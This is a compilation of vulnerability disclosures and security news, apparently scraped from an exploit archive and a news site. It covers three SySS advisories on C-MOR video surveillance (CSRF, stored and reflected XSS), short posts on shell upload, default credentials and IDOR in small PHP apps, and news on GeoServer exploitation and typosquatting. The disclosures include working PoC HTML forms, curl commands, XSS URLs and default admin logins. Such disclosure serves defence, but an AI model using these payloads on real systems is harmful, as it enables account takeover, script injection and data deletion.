C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a cross site request forgery vulnerability.

Advisory ID:               SYSS-2024-022  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Cross-Site Request Forgery (CWE-352)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45172  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to missing protection mechanisms, the C-MOR web interface is  
vulnerable to cross-site request forgery (CSRF) attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The C-MOR web interface does not offer any protection against CSRF  
attacks. These kinds of attacks force end users respectively their web  
browsers to perform unwanted actions in a web application context in  
which they are currently authenticated.

CSRF attacks specifically target state-changing requests, for example in  
order to enable or disable a feature, and not data theft, as an attacker  
usually has no possibility to see the response of the forged request.

In general, CSRF attacks are conducted with the help of the victim, for  
example by a user visiting an attacker-controlled URL sent by e-mail in  
their web browser. Often, CSRF attacks make use of cross-site scripting  
attacks, but this is not mandatory.

CSRF attacks can also be performed against a web application if a victim  
is only visiting an attacker-controlled web server. In this case, the  
attacker-controlled web server is used to generate a specially crafted  
HTTP request in the context of the user's web browser which is then sent  
to the vulnerable target web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTML file containing a web form generates a simple  
crafted HTTP POST request that creates a new user:

<html>  
     <body onload="document.forms[0].submit()">  
         <form action="https://<HOST>/dosetpassword.pml" method="POST">  
             <input type="hidden" name="user" value="attacker" />  
             <input type="hidden" name="user_fullname" value="Attacker" />  
             <input type="hidden" name="pw1" value="password" />  
             <input type="hidden" name="pw2" value="password" />  
         </form>  
     </body>  
</html>

When an authenticated C-MOR user with administrative privileges  
visits a web server hosting this HTML file, a new attacker-controlled  
user is created.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-022

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-022.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Cross Site Request Forgery

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a persistent cross site scripting vulnerability.

Advisory ID:               SYSS-2024-021  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Persistent Cross-Site Scripting (CWE-79)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45177  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to persistent cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that the camera  
configuration is vulnerable to a persistent cross-site scripting attack  
due to insufficient user input validation.

This kind of attack enables an attacker to persistently store attack  
vectors in form of arbitrary code, for instance JavaScript code, in the  
web application database, which may be executed in the context of other  
users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An authenticated user can set the location of a camera. If valid  
JavaScript code is used as location value, this code will be  
persistently stored in the web application database.

The injected JavaScript code is served to users and executed in their  
web browser's context when using different functionality of the C-MOR  
web interface, for instance camera settings via "show-movies.plm" or  
system administration via "systemadministration.plm".

The following HTTPS POST request illustrates storing an attack vector  
via the parameter "location":

POST /changelocation.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 81

location=location%3Cscript%3Ealert%28%22SySS+XSS%21%22%29%3C%2Fscript%3E&cam=cam1

An excerpt of the resulting HTML source code containing the injected  
JavaScript code is shown below:

(...)  
<input type=submit value="Aufzeichnung aktivieren" class="link_button2">   
location<script>alert("SySS XSS!")</script><br>  
(...)

This PoC attack can be performed using the following curl command:

curl -X POST -d 'location=location<script>alert("SySS   
XSS!")</script>&cam=cam1' --user "<USERNAME>:<PASSWORD>" --insecure   
--ciphers 'DEFAULT:!DH' https://<HOST>/changelocation.pml

In version 6.00PL01, persistent cross-site scripting vulnerabilties have  
not been fixed completely. For example, the following attack vector can  
successfully store attacker-controlled JavaScript code in the logs:

curl -X POST \  
    -d 'cam=</textarea><script>alert("Hello from   
XSS")</script><textarea>&days=1100' \  
    --user "<USERNAME>:<PASSWORD>" \  
    --insecure \  
    --ciphers 'DEFAULT:!DH' \  
    https://<HOST>/show-movies.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the  
newly released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-021

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-021.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Cross Site Scripting

C-MOR Video Surveillance version 5.2401 suffers from a reflective cross site scripting vulnerability.

Advisory ID:               SYSS-2024-020  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Reflected Cross-Site Scripting (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45176  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to reflected cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functions are prone to reflected cross-site scripting attacks due to  
insufficient user input validation.

This kind of attack allows an attacker to send a manipulated link to  
an authenticated victim in order to execute arbitrary JavaScript code  
in the context of the victim's web browser.

Reflected cross-site scripting vulnerabilities were found in the  
following C-MOR scripts and exploited via different URL parameters,  
for instance the parameter "ujava":

* index-de.plm  
* list-timelapse.plm  
* list-motion.plm  
* setdelays.plm  
* show-movies.plm  
* show-movies-f.plm  
* uploadcambackup.plm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following three sample attack vectors exemplarily demonstrate  
the found security issue.

1) index-de.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability via the URL parameter  
"ujava" of the web interface index page "index-de.plm":

https://<HOST>/index-de.pml?ujava="><script>alert("SySS XSS!")</script><z="

2) list-timelapse.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"list-timelapse.plm" via the URL parameter "days":

https://<HOST>/list-timelapse.pml?days=1100&cam=cam1"><script>alert("SySS   
XSS!")</script><z="

3) show-movies.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"show-movies.plm" via the URL parameter "days":

https://<HOST>/show-movies.pml?cam=cam1&days="><script>alert("SySS   
XSS!")</script><z="

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-020

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-020.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Cross Site Scripting

Travel version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Travel 1.0 Shell Upload

Webpay E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Insecure Settings

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

**Online Sports Complex Booking System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7ef39718e1694996d6c3234f87defd525659e7cde8353fa86e03c43c5fd1bf04

Download | Favorite | View

**Online Sports Complex Booking System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Sports Complex Booking System v1.0 Insecure Settings Vulnerability                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Sports Complex Booking System 1.0 Insecure Settings

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

**Online Pizza Ordering System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ea183be601d90798e6a525ee32f1811b36b16ef45e82b7172ff7fd9dada60b8e

Download | Favorite | View

**Online Pizza Ordering System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Pizza Ordering System 1.0 Insecure Settings

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**File Management System 1.0 Insecure Direct Object Reference**

Posted Sep 6, 2024

Authored by indoushka

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 80d45521f02111223db9c15921f68ebb49c243151cc2e7da343578636283f910

Download | Favorite | View

**File Management System 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : File Management System 1.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Payload enables deletion of uploaded files from admin control panel without login.[+] use payload : /Private_Dashboard/delete.php?ID=5[+] 127.0.0.1/demo/Private_Dashboard/delete.php?ID=5Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

File Management System 1.0 Insecure Direct Object Reference

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.
The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.
In

Cryptocurrency / APT Attack

A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.

The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.

In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.

According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.

These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.

The GeoServer server has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).

Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.

The starting point is a shell script that's responsible for downloading the ELF binaries for ARM, MIPS, and X86 architectures, which, in turn, extracts the C2 server from an encrypted configuration, connects to it, and receives further commands for execution on the compromised device.

This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.

"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.

"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."

The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across

Software Security / Hacking

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across platforms have relied on developers making typing errors to initiate software supply chain attacks through PyPI, npm, Maven Central, NuGet, RubyGems, and Crate.

The latest findings from cloud security firm Orca show that even GitHub Actions, a continuous integration and continuous delivery (CI/CD) platform, is not immune from the threat.

